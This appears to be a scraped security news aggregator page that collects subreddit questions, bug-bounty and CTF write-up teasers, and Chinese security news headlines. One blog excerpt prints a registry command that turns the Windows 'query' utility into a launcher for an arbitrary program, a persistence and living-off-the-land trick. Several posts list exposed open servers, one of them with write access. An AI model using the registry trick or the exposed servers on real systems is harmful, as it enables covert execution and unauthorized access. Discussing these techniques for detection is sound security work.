    Hello everyone and happy New Year! It's been a few months since the last one of these, but the sub has been running well so we've seen no need for a new one till now. ​ Banner We are in an active search for a new subreddit banner; if you'd like to submit one, please feel free to comment your submission. Guidelines for the banner are as follows: https://mods.reddithelp.com/hc/en-us/articles/360010112892-Banner Small banners: 1920×128 pixels, aspect ratio of 15:1 Medium banners: 1920×256 pixels, aspect ratio of 7.5:1 Large banners: 1920×384 pixels, aspect ratio of 5:1 ​ Discord We have been considering a community discord for a while now where members can help one another with active career questions, support, and much more. It's been decided to leave the creation of it up to what you all think. Please vote; the poll will be up for 7 days. Have a wonderful New year! - r/AskNetsec Mod Team. ​ ​ View Poll submitted by /u/-Vampires- [link] [comments]
    Are iOs notes "protected" by fingerprint safe ?
    Hello, In iOs, I can "protect" my notes with a password and with faceId or my fingerprint, but is it really safe? submitted by /u/hthouzard [link] [comments]
    A desperate cry for MacOS X forensic tools
    Seriously, what's wrong with it? If you look for toolsets, everything is pretty straightforward on Windows, slightly less on Linux, but there is plenty of information and MacOS X.. seems to be.. cursed? Everything starts with the acquisition phase. It must be simple, right? You need three images: a byte-accurate disk dump, decrypted disk dump suitable for analysis detachable from the T2 chip, and a memory dump. NO. Every tool out there is either 10 years old and does not work on modern MacOS, or is designed for LEAs and other entities who have forensic investigations as a core business or at least someone's day job. With a corresponding price tag attached. Every article out there is either hopelessly outdated or incomplete, or it is SEO-facelifted copywrited 10 years old content, or suggests silly things like using rsync for forensic imaging. If you look into Volatility framework manual, it explicitly says:"Volatility does not provide the ability to acquire memory. We recommend using Mac Memory Reader from ATC-NY, Mac Memoryze, or OSXPmem for this purpose. Remember to check the list of supported OS versions for each tool before using them." Guess what? None of these tools work today. Not a single one. It does not get any better on the next stages. Say, all information on hunting sleeping Cobalt Strike beacons is heavily Windows-centric. upd: those who downvote, care to elaborate in comments? submitted by /u/arkenoi [link] [comments]
    Password managers for enterprise
    I've recently been tasked with finding new password management solutions for our company after the LastPass security breach. Personally, I use Bitwarden and have had a good experience with it. The question now is whether we should go with the Bitwarden cloud service or host our own Bitwarden instance in Azure. As a company of around 100 employees, security is a top priority for us. Both options have their benefits, but I wanted to get some opinions from others who may have more experience with these types of decisions. One potential advantage of self-hosting is that we have the ability to monitor and set up alarms for detection, which could be beneficial for security purposes. What are your thoughts on the Bitwarden cloud vs self-hosted options? Are there any other password management solutions that you would recommend for a company of our size? submitted by /u/PapiPoseidon [link] [comments]
    Reasonably priced /Free DFIR Training
    Hi Everyone, Hope you are well. I'm a first time poster so apologies if this is a noob question. I am currently working in a SOC and I was looking to transition into either a digital forensics or an IR role. I really wasn't sure about what learning or training courses I should be taking to get my foot in the door here. I was in the process of completing the BTL1 exam and am working on tryhackme but they seem like quite simple. I looked into the SANS GIAC courses but they seem excessively expensive. Are there any other resources /structured training courses which I can work towards to move towards this role? Thanks and apologies if I haven't followed any of the moderators rules in advance. submitted by /u/Leather-Marsupial256 [link] [comments]
    Using anonaddy, simple login or similar services with own domain
    What do you think about using your own domain through anonaddy or similar services? I use this as catchall with service@domain.com for various accounts (shops etc) For me the pro is the administration. I can easily deactivate aliases if I want. The biggest downside is that it creates an additional middle man on the way to my email provider. Do you think this is a big security issue? submitted by /u/cake52 [link] [comments]
    Phishing email from knowbe4
    Happy New Year!! So i am a security analyst and i was going through our reported phishing emails and i see that knowbe4 is using one of our legitimate emails to send phishing ([humanresources@company.com](mailto:humanresources@company.com)). In my opinion this defies the purpose of phishing unless the domain can be spoofed, which is another topic altogether. Am i correct about this? submitted by /u/hannibal_the_general [link] [comments]
    How does ChatGPT work?
    The release of ChatGPT, an AIGC model, has caused a stir in the tech industry and has become one of the most exciting developments of 2022. This breakthrough reaffirms our belief in the potential of AI to revolutionize a variety of industries, including security. How does ChatGPT work? This blog summarized relevant AIGC technology and showed how it has progressed over the years. How does ChatGPT work? Tracing the evolution of AIGC. submitted by /u/Calm_Scene [link] [comments]
    Crowdstrike Falcon
    So I just noticed that my school offers Crowdstrike Falcon to students on our personal computers for free. Is it worth downloading? Currently I just use Windows Defender, plus an occasional MalwareBytes scan. submitted by /u/te91fadf24f78c08c081 [link] [comments]
  • Open

    Cloud Metadata - AWS IAM Credential Abuse
    submitted by /u/SNEAKYMONK3Y [link] [comments]
    GitHub - kitabisa/teler-waf: teler-waf is a Go HTTP middleware that provide teler IDS functionality with teler IDS to protect against web-based attacks and improve the security of Go-based web applications. It is highly configurable and easy to integrate into existing Go applications.
    submitted by /u/dwisiswant0 [link] [comments]
  • Open

    VHL 10.1x.1.160 — Core
    Virtual Hacking Labs Advanced box. Scan results below. Continue reading on Medium »
    VHL 10.1x.1.83 — John
    Beginner Box. This one is too easy. We’ll start with the scan. Continue reading on Medium »
    VHL 10.1x.1.2 — Lucky V2
    Another Virtual Hacking Labs Advanced box. Scan results below: Continue reading on Medium »
  • Open

    if for nothing else - use this link and watch BULLETTRAIN!!
    ​ http://51.15.7.117/AFLAM/E/ submitted by /u/LucasImages [link] [comments]
    Open Ftp With write access
    142.186.48.74 submitted by /u/u178x [link] [comments]
    Tv shows
    http://dl.gemescape.com/Series/ ​ If you're looking for Star Trek The Next Generation: http://188.210.209.2/EDI/Tv%20Shows/Star%20Trek%20The%20Next%20Generation/ submitted by /u/Waste-Release-6235 [link] [comments]
    A few movies
    http://www.landhanoitours.com:82/plex/720P_Vie/ Also some cartoons in parent directory. ​ submitted by /u/Waste-Release-6235 [link] [comments]
    Some software
    http://pub.agrarix.net/Windows/ submitted by /u/Waste-Release-6235 [link] [comments]
    Some nice wallpaper for your desktop
    http://7-themes.com/data_images/collection/1/ https://otlibrary.com/wp-content/gallery/wallpapers/ ​ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Imaging a 4 Bay Synology BTRFS SHR Raid Type
    I know enough about Synology / DSM to at least cause some trouble since I have one I use personally. Need to image a 4 Bay Synology next week. Plan on doing a logical collection but also plan on pulling each drive and imaging separately too. We should have cooperation for any admin credentials etc.. I do have some concerns about the unit that will need to check while on-site - Please share any tips for handling. Can X-Ways Rebuild this Raid type? Will need to check if our license is still valid for the copy. What if data replication or snapshots are enabled via Snapshot Replication/ Hyper Backup / Rsync Recycle bin enabled on certain shares? Mail being hosted via Synology Mail Plus Server - Can it be exported in PST format for eDiscovery purposes or would we have to acquire the mailboxes via Email Collection tool such as FEC? Any other tips or gotchas we should look out for when examining / capturing the unit? Thanks in advance. submitted by /u/no_sushi_4_u [link] [comments]
    The Windows Process Journey — audiodg.exe (Windows Audio Device Graph Isolation)
    submitted by /u/boutnaru [link] [comments]
  • Open

    Simple SQL Injection
    Sql injection is a very critical vulnaribility for any organization.An attacker can get hold of internal data through sql dump. Continue reading on Medium »
    Web-Cache Poisoning $$$? Worth it?
    In this article, I will try to guide the readers about a bug that is easy to miss and doesn’t get a lot of attention, but surely it’s… Continue reading on Medium »
    Vulnerability Assessment & Penetration Testing [VAPT]
    VAPT (Vulnerability Assessment and Penetration Testing) is a process that involves identifying and evaluating vulnerabilities in a system… Continue reading on Medium »
    My Learning Journey
    Hello everyone, My name is Yaseen and I am a software engineer with a passion for ethical hacking. I have decided to document my findings… Continue reading on Medium »
    An amazing way to turn a xss into an ATO
    In this write-up, I will discuss a bug that both myself and Flag_c0 discovered in a program. Without further delay, let’s get into it… Continue reading on Medium »
    Automated and Continuous Recon/Attack Surface Management — Amass Track and DB
    Not using Continuous Attack Surface Management is the reason you keep getting dupes, let’s talk about it… Continue reading on Medium »
    India’s Aadhar card source code disclosure via exposed .svn/wc.db
    Hi Guys, I recently found a .svn/wc.db folder exposed on a resident.uidai.gov.in, and used it to reconstruct the Web app’s source code. I… Continue reading on Medium »
    ChatGPT — Bug Bounty Recon Automation
    Well, in recent weeks ChatGPT has been the buzz. For those who don’t know what ChatGPT is? I am sorry to say that, you are far behind the… Continue reading on Medium »
    The three main types of XSS
    Continue reading on Medium »
    How I Got My First Reflected XSS Bug Bounty!
    it was way back in 2016 and i was new to this bug bounty thing, alot has changed since then Continue reading on Medium »
    How to get and handle malware
    Hello guys! In this blog I would like to share some things I learned, this is very important as malware analysis is risky by nature. Continue reading on Medium »
  • Open

    DROPS - Adversary Tool Command Generator / "Dynamic Cheat Sheet"
    submitted by /u/Trop_Chaud [link] [comments]
    Python utility for scraping manuals, documents, and other sensitive PDFs to generate targeted wordlists for expedited initial access and lateral movement
    [link] [comments]
    Offensive Software Exploitation (OSE) Course
    submitted by /u/dmchell [link] [comments]
    Rust reflective loader
    submitted by /u/dmchell [link] [comments]
    Automating cobalt strike profile generation with Jenkins
    submitted by /u/XRomRII [link] [comments]
    Reflective DLL Injection explained
    submitted by /u/Alternative_Art8728 [link] [comments]
  • Open

    SecWiki News 2023-01-02 Review
    2022太空安全报告 by ourren 实时缺陷定位 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-02 Review
    2022太空安全报告 by ourren 实时缺陷定位 by ourren 更多最新文章,请访问SecWiki
  • Open

    ReDoS (Rails::Html::PermitScrubber.scrub_attribute)
    Ruby on Rails disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1684163
    Address Bar Spoofing on TOR Browser
    Tor disclosed a bug submitted by soulhunter: https://hackerone.com/reports/275960
  • Open

    ‍IW Weekly #40: Open Redirection Vulnerability, Misconfigured Jira, Bugs in Red Bull, ChatGPT…
    No content preview
    CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building
    No content preview
  • Open

    ‍IW Weekly #40: Open Redirection Vulnerability, Misconfigured Jira, Bugs in Red Bull, ChatGPT…
    No content preview
    CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building
    No content preview
  • Open

    ‍IW Weekly #40: Open Redirection Vulnerability, Misconfigured Jira, Bugs in Red Bull, ChatGPT…
    No content preview
    CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building
    No content preview
  • Open

    OSINT — Cold War Enemies
    This article is my solution to the CTF challenged titled Cold War Enemies, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    OSINT — Road To Nowhere
    This article is my solution to the CTF challenged titled Road To Nowhere, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    OSINT— On The Wire
    This article is my solution to the CTF challenged titled On The Wire, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    OSINT — The Spy Who Vanished
    This article is my solution to the CTF challenged titled The Spy Who Vanished, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    Email Analysis — Tips & Resources
    Tips and resources on how to have a better understanding of phishing attacks using email messages. Continue reading on Medium »
  • Open

    OFRAK:一款功能强大的源代码分析和修改平台
    OFRAK全称为Open Firmware Reverse Analysis Konsole,该工具是一款功能强大的源代码分析和修改平台。
    FreeBuf早报 | 谷歌将支付近三千万美元和解位置跟踪;加拿大矿业公司遭攻击后关闭
    谷歌已同意支付总计2950万美元,以解决印第安纳州和华盛顿特区就其“欺骗性”位置跟踪做法提起的两起不同的诉讼。
    FreeBuf早报 | 谷歌将支付2950万美元诉讼费;加拿大矿业公司遭攻击后关闭
    全球动态1.LockBit被破解!日本警方已帮助3家企业恢复数据据日本媒体报道,日本警察厅已成功解密由LockBit勒索软件组织加密的文件,帮助至少 3 家公司在没有支付赎金的情况下恢复了数据。【阅读原文】2.勒索软件团伙克隆受害者的网站以泄露被盗数据ALPHV 勒索软件运营商在勒索策略上发挥了创意,至少在一个案例中,创建了受害者网站的复制品以在其上发布被盗数据。【外刊-阅读原文】3.美国路易斯安
    Aftermath:一款针对macOS的免费开源事件响应框架
    Aftermath是一款针对macOS的事件响应框架,该工具基于Swift语言开发,是一款完全免费且开源的网络安全事件响应框架。

  • Open

    Fuzzing Random Ubuntu Packages with Mayhem — Part 1
    About Mayhem Continue reading on Medium »
  • Open

    Fuzzing Random Ubuntu Packages with Mayhem — Part 1
    About Mayhem Continue reading on Medium »
  • Open

    VHL 10.1x.1.36 — Steven
    Another VHL beginner box. Scan results below. Continue reading on Medium »
  • Open

    Are elusive vulnerabilities still relevant ?
    By elusive here i am speaking about exploits like request smuggling,cache deception,cache poison,Json interoperability https://bishopfox.com/blog/json-interoperability-vulnerabilities I have read a couple of articles on portswagger that said these vulnerabilities are on the top list in 2022 ,and many researchers have spoken about them,yet when i search for reports on them on Hackerone ,the recent ones are from 2-3 years ago. I know that bug hunting and penetration is different,but if an application have been tested for the normal and popular exploits (xss,sql injection,etc) i feel that not many people would test the elusive vulnerabilities which mean they might be present. submitted by /u/Ramseesthe4th [link] [comments]
    If I don't encrypt my Gmail I'm dumb?
    I was watching a CompTIA course and the instructor was speaking about the differents certifications and how it can improve our daily emails. Also, he said we can encrypt our regular email from Yahoo or Gmail. What benefits I can have encrypting my gmail account? It would only more privacy for my box or something else? What setup do you recommend me to install on my gmail? submitted by /u/MrNoodlesLearns [link] [comments]
  • Open

    My report on how the admin panel took over and I got X, $500 bounty from my report Hello hackers,
    Description: Continue reading on Medium »
    $500 in 5 minutes
    Extremely easy bug to find with good bounties. Continue reading on Medium »
    Hunt XSS easily
    Hi, everyone .XSS is a common bug that is found accross all the platforms.The easiest way to do that is to use an automation tool .For… Continue reading on Medium »
    Learning Web-Sec - Day 6 - PortSwigger SQL Injection Labs
    Blind SQL Injection with Time Delays Continue reading on Medium »
    How I Design My Prefect Bug Bounty Automation(3)
    This article I will tell you what I think is the prefect Bug Bounty automatiion architecture, It doesn’t require you code much, only takes… Continue reading on Medium »
    Ways to Exploit Cross site leaks
    What is Cross Site Leaks Vulnerability? Continue reading on Medium »
  • Open

    Basics of OSINT Essay
    Introduction Continue reading on Medium »
    End Of The Year UDOM CTF 2022
    Just a few hours before “cd year-2023” or “sudo apt install year-2023” if you’d prefer, I participated in an awesome CTF competition… Continue reading on Medium »
    SPY NEWS: 2022 — Week 52
    Summary of the espionage-related news stories for the Week 51 (December 25–31) of 2022. Continue reading on Medium »
  • Open

    Exploiting Unpatched Vulnerability in TP-Link WR940N V6 Router
    Article URL: https://github.com/b1ack0wl/vulnerability-write-ups/blob/master/TP-Link/WR940N/112022/Part1.md Comments URL: https://news.ycombinator.com/item?id=34209363 Points: 2 # Comments: 0
  • Open

    SecWiki News 2023-01-01 Review
    云原生安全系列(二)| 利用K8s污点容忍度横向移动主节点 by tinyfisher SLEUTH:基于COTS审计数据的实时攻击场景重构 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-01 Review
    云原生安全系列(二)| 利用K8s污点容忍度横向移动主节点 by tinyfisher SLEUTH:基于COTS审计数据的实时攻击场景重构 by ourren 更多最新文章,请访问SecWiki
  • Open

    GitHub - jafarlihi/modreveal: Utility to find hidden Linux kernel modules
    submitted by /u/jafarlihi [link] [comments]
    Compromised PyTorch-nightly dependency chain
    submitted by /u/z84 [link] [comments]
  • Open

    Netscape screensavers
    https://ftp.mizar.org/pub/www/netscape/screensavers/english/ submitted by /u/Waste-Release-6235 [link] [comments]
    Electrolytic Capacitor manuals
    http://www.paullinebarger.net/DS/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Investigating Sensitive Files Theft | Registry Forensics | TryHackMe Secret Recipe
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Java代码审计-SQL注入全解
    1、基础理论介绍1.1、数据库类型数据库现在比较常见,很多企业都会使用数据库来管理存储数据,常见的数据库划分类型有,关系型数据库和非关系型数据库;关系型数据库采用了关系模型来组织数据的数据库,简单来说
    植入 VMware ESXi 的 Python 后门
    2022 年 10 月,研究人员发现了一个植入 VMware ESXi 服务器的后门。
    针对交易软件 TradingView 的供应链攻击
    近期,研究人员发现有攻击者伪装成交易应用程序的 Windows 安装程序来分发 ArkeiStealer 窃密恶意软件。

  • Open

    Persistence and LOLBins
    Grzegorz/@0gtweet tweeted something recently that I thought was fascinating, suggesting that a Registry modification might be considered an LOLBin. What he shared was pretty interesting, so I tried it out. First, the Registry modification: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\Utilities\query" /v LOLBin /t REG_MULTI_SZ /d 0\01\0LOLBin\0calc.exe Then the command to launch calc.exe: query LOLBin Now, I've tried this on a Windows 10 system and it works great, even though Terminal Services isn't actually running on this system. Running just the "query" command on both Windows 10 and Windows 11 systems (neither with Terminal Services running) results in the same output on both: C:\Users\harlan>query Invalid parameter(s) QUERY { PROCESS | SESSION | TERMSERVER | USER } Ru…
    Keeping Grounded
    As 2022 comes to a close, I reflect back over the past year, and the previous years that have gone before. I know we find it fascinating to hear "experts" make predictions for the future, but I tend to believe that there's more value in reflecting on and learning from the past. Years ago, I remember hearing about something in legal circles referred to as "the CSI effect". In short, the unrealistic portrayal of "forensics" on TV shows had influenced public opinion. People would watch an hour-long crime drama TV show and what they saw set the expectation in their minds of "forensics" should be, and this unrealistic expectation made it difficult for prosecutors to convince some juries of their evidence. Over the holiday season, a "bomb cyclone" across the US combined with the numbers of folks…
  • Open

    Military Intelligence 101: A Beginner’s Guide to Understanding and Using It
    Continue reading on Medium »
    Tryhackme Advent of Cyber Day 3
    Another day, Another challenge. This one is based off OSINT (Open Source Intelligence). Continue reading on Medium »
  • Open

    Amenazas persistentes avanzadas y por qué Pentesting regular no es suficiente
    Las amenazas persistentes avanzadas (APT) son ataques cibernéticos dirigidos y sofisticados que tienen como objetivo infiltrarse en una… Continue reading on Medium »
  • Open

    French Porn, Movies, Documentaries. Repost ish (2 years old) uploaded 2022 dates and Slow 600K/s
    PD is just a text reply. (the 2 year old post), this is a Dir that is open. https://multi-1.w1p.fr/monq_glenn_hughes/ and the beauty of the Internet: The_A-Team_XXX_A_Parody.mp4 repost ish from: https://www.reddit.com/r/opendirectories/comments/laozv8/od_with_some_old_user_free_websites_i_think_some/ submitted by /u/thats_dumberst [link] [comments]
    Random images
    https://tomthefanboy.com/misc/ submitted by /u/Waste-Release-6235 [link] [comments]
    Cybersecurity books from humble bundle
    submitted by /u/SnooSketches2164 [link] [comments]
  • Open

    RECON FOR BUG BOUNTY- Tool Part1
    Reconnaissance play very important role in any security auditing or bug bounty program. In this article we will see how DIRB can be used… Continue reading on Medium »
    Learning Web-Sec - Day 5 - PortSwigger Blind SQL Injection Labs
    Blind SQL Injection with Conditional Errors Continue reading on System Weakness »
    Learning Web-Sec - Day 5 - PortSwigger Blind SQL Injection Labs
    Blind SQL Injection with Conditional Errors Continue reading on Medium »
    Navigating the World of Directory Traversal
    Are you tired of being hacked left and right? Fear not, dear reader! Today, we’re talking about directory traversal, a sneaky little… Continue reading on Medium »
    Hacking Bigbasket Ethically For Free Groceries
    Who doesn’t love free groceries? In this write-up, I will be discussing a cart tampering vulnerability that I discovered in the popular… Continue reading on Medium »
    My cybersecurity goals for 2023!
    I am thinking of trying some bug bounty from HackerOne this year. It will be my priority in 2023 alongside @hackthebox_eu. I think it will… Continue reading on Medium »
    ‘PTN’ infosec monthly #7 — InfoSec Updates
    Namaste everyone, Continue reading on Pentester Nepal »
    Cybersecurity: Trends from 2022 & Forecasts for 2023
    Cyberattacks grabbed headlines throughout 2022, and 2023 seems to be just as damaging. Cybercriminals’ techniques are evolving, and they… Continue reading on Bug Zero »
    Discovering vulnerabilities quickly with targeted scanning — Portswigger
    This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of… Continue reading on InfoSec Write-ups »
  • Open

    What to know before starting browser exploitation?
    Hello, for now I'm studying web hacking with "Bug Bounty Bootcamp" by Vickie Li. When I finish the book, I will return to study binary exploitation, in particular I will start browser exploitation. What I have to know before I can start browser exploitation? I know the basics of web development (HTML, CSS, JS, Php, SQL), C, Python, Java and some assembly (x86 and x64) submitted by /u/wlo1337 [link] [comments]
  • Open

    Antique HackTheBox Walkthrough
    Summary Antique is Linux machine and is considered an easy box by the hack the box. On this box, we will begin with a basic
    Antique HackTheBox Walkthrough
    Summary Antique is Linux machine and is considered an easy box by the hack the box. On this box, we will begin with a basic
  • Open

    SecWiki News 2022-12-31 Review
    MOSAICS 工业控制系统的扩展态势感知框架 by ourren Open-CyKG:开放式网络威胁知识知识图谱 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-31 Review
    MOSAICS 工业控制系统的扩展态势感知框架 by ourren Open-CyKG:开放式网络威胁知识知识图谱 by ourren 更多最新文章,请访问SecWiki
  • Open

    LuaJIT Sandbox Escape: The Saga Ends
    submitted by /u/Gallus [link] [comments]
  • Open

    what's the average salary for network security Engineer with 2 years of experience in your country?
    what's the average salary for network security Engineer with 2 years of experience in your country? submitted by /u/AdDifficult1588 [link] [comments]
    When do we stop reporting on CSRF issues?
    I've noticed for a while that PoC's for CSRF vulnerabilities, due to browsers implementing SameSite cookies by default, are more and more infeasible. I've been a strong defender of the "not everyone has a modern browser" but we're moving to a point where older browsers already aren't working (ie, 'fetch' and 'const'). What's your take on when we cross this off as a threat? submitted by /u/disclosure5 [link] [comments]
    How do you retrieve (decrypt) a payload from a LoRa Chirpstack downlink frame at an edge device?
    What is an efficient recipe for extracting a payload from a downlink frame at an edge device? Below are three contiguous frames generated by Chirpstack that have arrived at my edge device. Spaces have been added for visual effect. Note that the sizes are correct among them in terms of bytes. This will involve some AES decryption with a final XOR. Only parts of these frames are encrypted. But how would I perform the XOR on a variable-length payload? (1) 600b0b0b 009f c825 03000100700330ffff01050868e28c 01187f7ffa ad1af8 (2) 600b0b0b 008f c925 03000100700330ffff01050868e28c 01ad9eb655 316b42 052d7e (3) 600b0b0b 008f ca25 03000100700330ffff01050868e28c d5248606 600b0b0b is my device address with a network derived code inserted in the first byte. c825,c925,ca25 are the frame counters incrementing on each frame (little endian). Note , again, those bytes are not encrypted. (1) contains the payload FADE93 (2) contains the payload FADE93FADE93 (3) contains an empty payload. So how do I get them out of the frames? submitted by /u/vwibrasivat [link] [comments]
  • Open

    基于ddddocr库的网站验证码识别的爆破初探
    前言在常规的爆破工作中,如果网站的验证码无法绕过,这个时候就需要用到验证码的自动识别来辅助我们的爆破工作,本文将以最常用的数字加字母组合的4位验证码进行探讨,用到的实验环境是python的ddddoc
    有趣的Hack-A-Sat黑掉卫星挑战赛——卫星任务规划制订
    本文介绍了Hack-A-Sat黑掉卫星挑战赛的卫星任务规划制定Mission这道赛题的解题过程。
  • Open

    APT组织Confucius针对巴基斯坦IBO反恐行动的网络攻击事件分析 – 绿盟科技技术博客
    submitted by /u/dmchell [link] [comments]
  • Open

    Fuzzing smart contracts
    Fuzzing smart contracts in ethereum blockchain is becoming hybrid: combining tools is allowing fuzzing to cover more code paths and find… Continue reading on Coinmonks »
    Fuzzing smart contracts
    Fuzzing smart contracts in ethereum blockchain is becoming hybrid: combining tools is allowing fuzzing to cover more code paths and find… Continue reading on Medium »
  • Open

    Fuzzing smart contracts
    Fuzzing smart contracts in ethereum blockchain is becoming hybrid: combining tools is allowing fuzzing to cover more code paths and find… Continue reading on Coinmonks »
    Fuzzing smart contracts
    Fuzzing smart contracts in ethereum blockchain is becoming hybrid: combining tools is allowing fuzzing to cover more code paths and find… Continue reading on Medium »
  • Open

    Bitlocker RAM dump attack
    Hey guys, I'm quite new to computer forensics. I tried to open a bitlocker encrypted drive by extracting the key from a memory dump, but the tools I used didn't find anything. My understanding is that the bitlocker full encryption key leaks into the RAM when the computer boots. Is this only true, when the disk had been encrypted and/or has been already unlocked on the target computer, or does this happen on every computer? For example if I have a bitkocker encrypted drive, and I mount it to my computer, but obviously I can't unlock it without the password, can extract the key from my own computer? submitted by /u/zsigmons [link] [comments]
  • Open

    Guests can continue to receive video streams from call after being removed from a conversation
    Nextcloud disclosed a bug submitted by daniel_calvino_sanchez: https://hackerone.com/reports/1706248
    No password length limit when creating a user as an administrator
    Nextcloud disclosed a bug submitted by hackeronefour: https://hackerone.com/reports/1727424
    Disabled download shares still allow download through preview images
    Nextcloud disclosed a bug submitted by juliushaertl: https://hackerone.com/reports/1745766

  • Open

    Secure medium for data transfer in and out of air-gapped systems
    I am separating my communication and cryptography systems (an offline system in which used the encryption and decryption takes place, like an HSM). No treat at that level, it’s just a fun exercise! The cryptography system will not be connected to any network. I am looking for a medium to transfer data in and out of the air gapped system securely. The medium can be configured to be read-only storage, has minimal firmware (something like the open source coreboot but for storage), or a firmware signed by a trusted party with verifiable signature. This way, it’s harder for the compromised communication system to infect the USB with malware that propagates to the encryption system. The medium should support say 1TB (so optical disks are not very useful, since they are limited in capacity to tens of GBs). What’s the best tool for this purpose? Modern SSDs/HDDs come with complex proprietary firmware software (almost like an operating system) and controllers. I am not looking for fancy one-way diodes or similar, that is impractical. submitted by /u/chaplin2 [link] [comments]
    Custom Detection For Ducklogs Malware
    I’m trying to build a Defender custom detection query with KQL. I’ve written a query based on hashes and file names but we know that these can easily change. I wanted to build the detection based on behavior instead of hashes and filenames. One aspect of behavior is that the Ducklogs malware “uses the steganography technique to hide malicious content in the compressed bitmap image.” I figured basing the detection on a bitmap image being decompressed would be a good place to start but there may be better/more reliable aspects of the malwares behavior to build the detection on. So I have two questions: Does anyone know what service/process Windows would use for decompressing a bitmap image? (Since I’m new to cyber) How would I find this information in future? I tried to using procmon while decompressing my own bitmap image but nothing yet. Thank you. submitted by /u/Guitarware [link] [comments]
    How to get a handle on AWS security, multiple accounts, don't know AWS well
    I have been doing IT for like 20 years, currently in an information security role. I am comfortable with on-premise stuff, some Azure but AWS feels so foreign and complicated. I feel like this is an area I need to get better at to secure out environment but not really sure where to start. I don't want to go watch random YouTube videos I feel like I need some starting point and track to follow? submitted by /u/junkaccount1999 [link] [comments]
    What do you use for developer secure coding training?
    Most of them have a MSDN, not sure if there is anything free that is good in there. We have KnowBe4 but it isn't great beyond security awareness training. Spoke with Veracode as an option but do you have any recommendations? submitted by /u/junkaccount1999 [link] [comments]
    How to prepare for the Crest CPSA?
    Hello everyone, I intend to take the Crest CPSA soon but don't know how to prepare because there isn't much information available online. I bought O'Reilly's Network Security Assessment book; should I study and check off the topics on the syllabus? Thank you, Joseph submitted by /u/Josephzhang [link] [comments]
    Regarding remote jobs
    i am have experience in WAPT, appsec wanted to know are there any opportunity in which i can get a remote job, internship or in projects that is paid, i have searched many companies and applied them but many of them demand oscp,sans certs and onsite job which are not budget friendly for me besides i love to colloborate and wanted to learn. basically needed an entry level job which is remote...would be really helpful for your help :) submitted by /u/Vijay-Vidhrohi [link] [comments]
    Chatgpt for vulnerability discovery
    Chatgpt can actually detect vulnerabilities in the code if you give him a piece of text. Do you think it can possibly replace SAST tools( onarqube, codeql, semgrep, snyk, etc) as you can use chatgpt or its APIs to find vulnerabilities while the developer team is working on code? submitted by /u/Calm_Scene [link] [comments]
  • Open

    How can I get practical experience?
    I've recently become interested in pursuing a career in computer forensics. I've got a programming background (proficient with Python for data analysis) and currently work as an analyst for a software company. So, I'm very comfortable with IT stuff in general. I'm having trouble figuring out how to get practical experience for digital forensics. If I wanted to get good at woodworking, I would buy wood, buy tools, and create something with it. But that same path for this type of forensics is not obvious to me. People aren't exactly releasing disk images full of financial transactions for people like me to analyze. So, how is someone to supposed to find data to get practical experience with? submitted by /u/Megacannon88 [link] [comments]
  • Open

    GCPGoat(ine) GCP CTF solution Module 1-Scenario 2
    Hi readers, here we will be solving the GCPGoat module 1(Path 2). Continue reading on Medium »
    Introduction to PowerSploit: A Collection of PowerShell Tools for Penetration Testing and Red…
    PowerSploit is a collection of PowerShell scripts and tools that are designed to assist with penetration testing and red teaming… Continue reading on Medium »
  • Open

    The Right Time for a Bug Bounty and Security Team
    Starting a bug bounty program and hiring a security team are important steps for companies to take to ensure the security and… Continue reading on Medium »
    Learning Web-Sec - Day 4 - PortSwigger SQL Injection Labs
    Blind SQL Injection. Continue reading on System Weakness »
    Learning Web-Sec - Day 4 - PortSwigger SQL Injection Labs
    Blind SQL Injection. Continue reading on Medium »
    Renewing Composable’s Bug Bounty Program for Picasso via Immunefi
    As a part of our ongoing commitment to security, we are proud to announce the renewal of our bug bounty program with Immunefi Continue reading on Medium »
    CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building
    Introduction: Continue reading on Medium »
    Bug Zero at a Glance [Week 24–30 December]
    What happened with Bug Zero? Continue reading on Bug Zero »
    BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs)
    A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and… Continue reading on Medium »
    Setting up your bug bounty scripts with Python and Bash
    How to set up python and bash scripts for bug bounty automation for powerful automation? Thought about this ever? Read this article to… Continue reading on InfoSec Write-ups »
    How I Design My Prefect Bug Bounty Automation(2)
    So, let’s followed by the previoous article. Continue reading on Medium »
    Get an Edge with ChatGPT: 10 Ways It Can Benefit Smart Contract Auditors and Bug Bounty Hunters
    ChatGPT Continue reading on Medium »
    Difficulty of Reproducing Old Exploits (Part Two)
    In Part One, I described my journey to try to reproduce the Fei protocol exploit, following an article by Lucash-dev written for Immunefi. Continue reading on Medium »
  • Open

    Greta Thunberg Takes Down Andrew Tate With 1 Tweet — OpSec Fails
    Continue reading on Medium »
    Reducción de la Superficie de Ataque para la Seguridad Informática
    La superficie de ataque comprende todas aquellas áreas por las cuales un adversario puede intentar vulnerar y explotar un sistema. Por… Continue reading on Medium »
    PAI Research Process, part 4
    When you are confident you can adequately address the research topic, you should begin the process to develop the final product for your… Continue reading on Medium »
  • Open

    Architecture Notes - Capture the Flag.
    submitted by /u/myusuf3 [link] [comments]
    Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463
    submitted by /u/Gallus [link] [comments]
    There is no secure software supply-chain.
    submitted by /u/dlorenc [link] [comments]
    Reverse Prompt Engineering - Pwning the source prompts of Notion AI & 7 techniques for Reverse Prompt Engineering
    submitted by /u/Gallus [link] [comments]
    Mosca SAST tool
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Dom-Based XSS on parameter ?vsid=
